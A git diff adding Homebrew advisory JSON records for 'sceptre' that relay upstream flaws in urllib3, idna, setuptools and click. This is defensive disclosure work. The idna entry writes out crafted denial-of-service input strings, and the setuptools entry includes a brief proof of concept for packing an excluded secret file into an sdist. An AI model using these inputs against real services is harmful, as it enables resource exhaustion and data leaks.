+ "url": "https://github.com/urllib3/urllib3" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-44432.json b/advisories/BREW-sceptre-CVE-2026-44432.json new file mode 100644 index 00000000000..06b62a24441 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-44432.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-44432", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-mf9v-mfxr-j63j", + "CVE-2026-44432", + "PYSEC-2026-142" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.7.0", + "resource": "urllib3", + "resource_purl": "pkg:pypi/urllib3@2.7.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "urllib3", + "subject_version": "2.7.0", + "key": "pkg:pypi/urllib3@2.7.0", + "resource": "urllib3" + } + ] + }, + "summary": "urllib3: Decompression-bomb safeguards bypassed in parts of the streaming API", + "details": "### Impact\n\nurllib3's [streaming API](https://urllib3.readthedocs.io/en/2.7.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once.\n\nurllib3 can perform decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API since version 2.6.0, the library decompresses only the necessary bytes, enabling partial content consumption.\n\nHowever, urllib3 before version 2.7.0 could still decompress the whole response instead of the requested portion in two cases:\n1. During the second `HTTPResponse.read(amt=N)` call when the response was decompressed using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. When `HTTPResponse.drain_conn()` was called after the response had been read and decompressed partially (compression algorithm did not matter here).\n\nThese issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side.\n\n\n### Affected usages\n\nApplications and libraries using urllib3 versions earlier than 2.7.0 may be affected when streaming compressed responses from untrusted sources in either of these cases, unless decompression is explicitly disabled:\n\n1. A response encoded with `br` is read incrementally with at least two `HTTPResponse.read(amt=N)` or `HTTPResponse.stream(amt=N)` calls while using the official [Brotli](https://pypi.org/project/brotli/) library.\n2. `HTTPResponse.drain_conn()` is called after response decompression has already started.\n\n\n### Remediation\n\nUpgrade to at least urllib3 version 2.7.0 in which the library:\n1. Is more efficient for reads with Brotli.\n2. Always skips decompression for `HTTPResponse.drain_conn()`.\n\nIf upgrading is not immediately possible, the following workarounds may reduce exposure in specific cases:\n1. For the Brotli-specific issue only, switch from [brotli](https://pypi.org/project/brotli/) to [brotlicffi](https://pypi.org/project/brotlicffi/) until you can upgrade urllib3; the official Brotli package is affected because of https://github.com/google/brotli/issues/1396.\n2. If your code explicitly calls `HTTPResponse.drain_conn()`, call `HTTPResponse.close()` instead when connection reuse is not important.\n\n\n### Credits\n\nThe Brotli-specific issue was reported by @kimkou2024.\n`HTTPResponse.drain_conn()` inefficiency was reported by @Cycloctane.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2026-142.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/urllib3/urllib3" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-45409.json b/advisories/BREW-sceptre-CVE-2026-45409.json new file mode 100644 index 00000000000..87328e78b5c --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-45409.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-45409", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-65pc-fj4g-8rjx", + "CVE-2026-45409", + "PYSEC-2026-215" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.15", + "resource": "idna", + "resource_purl": "pkg:pypi/idna@3.18" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "idna", + "subject_version": "3.18", + "key": "pkg:pypi/idna@3.18", + "resource": "idna" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "idna", + "subject_version": "3.18", + "key": "pkg:pypi/idna@3.18", + "resource": "idna" + } + ] + }, + "summary": "Internationalized Domain Names in Applications (IDNA): Specially crafted inputs to idna.encode() can bypass CVE-2024-3651 fix", + "details": "This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. Payloads such as `\"\\u0660\" * N` or `\"\\u30fb\" * N + \"\\u6f22\"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process.\n\n### Impact\nA specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service.\n\n### Patches\nStarting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support).\n\n### Workarounds\nDomain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45409" + }, + { + "type": "PACKAGE", + "url": "https://github.com/kjd/idna" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2026-215.yaml" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-59890.json b/advisories/BREW-sceptre-CVE-2026-59890.json new file mode 100644 index 00000000000..bfc45c7c796 --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-59890.json @@ -0,0 +1,98 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-59890", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "GHSA-h35f-9h28-mq5c", + "BIT-setuptools-2026-59890", + "CVE-2026-59890", + "PYSEC-2026-3447" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "83.0.0", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@83.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "83.0.0", + "key": "pkg:pypi/setuptools@83.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "setuptools: MANIFEST.in exclusion bypass in sdist via Unicode normalization collision (NFC/NFD) on macOS APFS/HFS+", + "details": "## Summary\n\nWhen building a source distribution (`python -m build --sdist` / `setup.py sdist`), setuptools' `FileList` applies `MANIFEST.in` directives (`exclude`, `global-exclude`, `recursive-exclude`, `prune`) by matching a compiled glob against on-disk file names **byte-for-byte, with no Unicode normalization**. On normalization-preserving filesystems (notably macOS APFS and HFS+), a file written in NFD and a `MANIFEST.in` rule written in NFC refer to the same file but are byte-distinct, so the exclusion silently fails to match. A file the maintainer intended to exclude is then packed into the `.tar.gz` and, if published, uploaded to the public, immutable PyPI index.\n\n## Details\n\nFile names in `FileList.files` come from `os.walk` (`setuptools/_distutils/filelist.py`, `_find_all_simple`), so on APFS a file written NFD is offered to the matcher in NFD, while the `MANIFEST.in` pattern carries the author's editor form (typically NFC). The matching path performs no canonicalization:\n\n```python\n# setuptools/command/egg_info.py (FileList.global_exclude)\ndef global_exclude(self, pattern):\n match = translate_pattern(os.path.join('**', pattern)) # fnmatch.translate -> regex, no NFC/NFD\n return self._remove_files(match.match) # byte-level regex over raw os.walk names\n```\n\nA rule written NFC (`café` = `63 61 66 c3 a9`) does not match an on-disk name written NFD (`café` = `63 61 66 65 cc 81`), even though the filesystem treats the two as one file.\n\nA `unicodedata.normalize('NFD', ...)` helper exists in `setuptools/unicode_utils.py` (`decompose()`), but it is **never called in the manifest matching path**, so neither the pattern nor the walked path is normalized before matching. The only normalization in this area, `EggInfoCommand._manifest_normalize`, uses `filesys_decode` (bytes→str decode only, no NFC/NFD) and runs when writing `SOURCES.txt`, after matching has already occurred.\n\n## Impact\n\n`MANIFEST.in` exclusions are the documented mechanism maintainers use to keep secrets, local configs, and private fixtures out of the published sdist. A non-ASCII excluded file may be published to the public, immutable PyPI index despite the rule — an irreversible disclosure with no visual cue (NFC and NFD forms render identically). Exposure is filesystem-dependent and most relevant on macOS APFS/HFS+, where many maintainers build and publish. Pure-ASCII rules are unaffected.\n\n## Proof of concept\n\nWith a project containing `MANIFEST.in`:\n\n```\nglobal-include *.txt *.json\nglobal-exclude secret_café.txt # rule saved NFC\n```\n\nand an on-disk file `secret_café.txt` written in NFD, `python -m build --sdist` packs the secret file into the resulting `.tar.gz`, while an ASCII control file excluded by the same directive is correctly dropped — isolating the bypass to the NFC-pattern vs. NFD-name mismatch. Reproduced on macOS APFS with setuptools 82.0.1.\n\n## Remediation\n\nNormalize both the walked path and each `MANIFEST.in` pattern to a single canonical form before matching, in both `setuptools/command/egg_info.py` (`FileList`) and the vendored `setuptools/_distutils/filelist.py`. For an exclusion list, err toward excluding more, and document that `MANIFEST.in` matching is normalization-insensitive on macOS.\n\n## Credit\n\nReported by Tomas Illuminati. Coordinated via CERT/CC VINCE VU#604762.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/security/advisories/GHSA-h35f-9h28-mq5c" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59890" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/dd9f436a36486b4cb8a4c70a2321548b0be09b8f" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2026-3447.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/releases/tag/v83.0.0" + } + ] +} diff --git a/advisories/BREW-sceptre-CVE-2026-7246.json b/advisories/BREW-sceptre-CVE-2026-7246.json new file mode 100644 index 00000000000..d8bf65ee49f --- /dev/null +++ b/advisories/BREW-sceptre-CVE-2026-7246.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-sceptre-CVE-2026-7246", + "published": "2026-08-13T17:34:18Z", + "modified": "2026-08-13T17:34:18Z", + "upstream": [ + "PYSEC-2026-2132", + "CVE-2026-7246", + "GHSA-47fr-3ffg-hgmw" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "sceptre", + "purl": "pkg:brew/sceptre" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.0_1" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "8.3.3", + "resource": "click", + "resource_purl": "pkg:pypi/click@8.4.2" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "click", + "subject_version": "8.4.2", + "key": "pkg:pypi/click@8.4.2", + "resource": "click" + } + ] + }, + "details": "Pallets Click, versions 8.3.2 and below, contain a command injection vulnerability in the click.edit() function, allowing attackers to pass arbitrary OS commands from an unprivileged account.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-7246" + }, + { + "type": "WEB", + "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-7246.json" + }, + { + "type": "ADVISORY", + "url": "https://access.redhat.com/errata/RHSA-2026:24761" + }, + { + "type": "ADVISORY", + "url": "https://access.redhat.com/errata/RHSA-2026:24762" + }, + { + "type": "REPORT", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2464121" + }, + { + "type": "FIX", + "url": "https://github.com/pallets/click/releases/tag/8.3.3" + }, + { + "type": "EVIDENCE", + "url": "https://github.com/tsigouris007/security-advisories/security/advisories/GHSA-47fr-3ffg-hgmw" + } + ] +}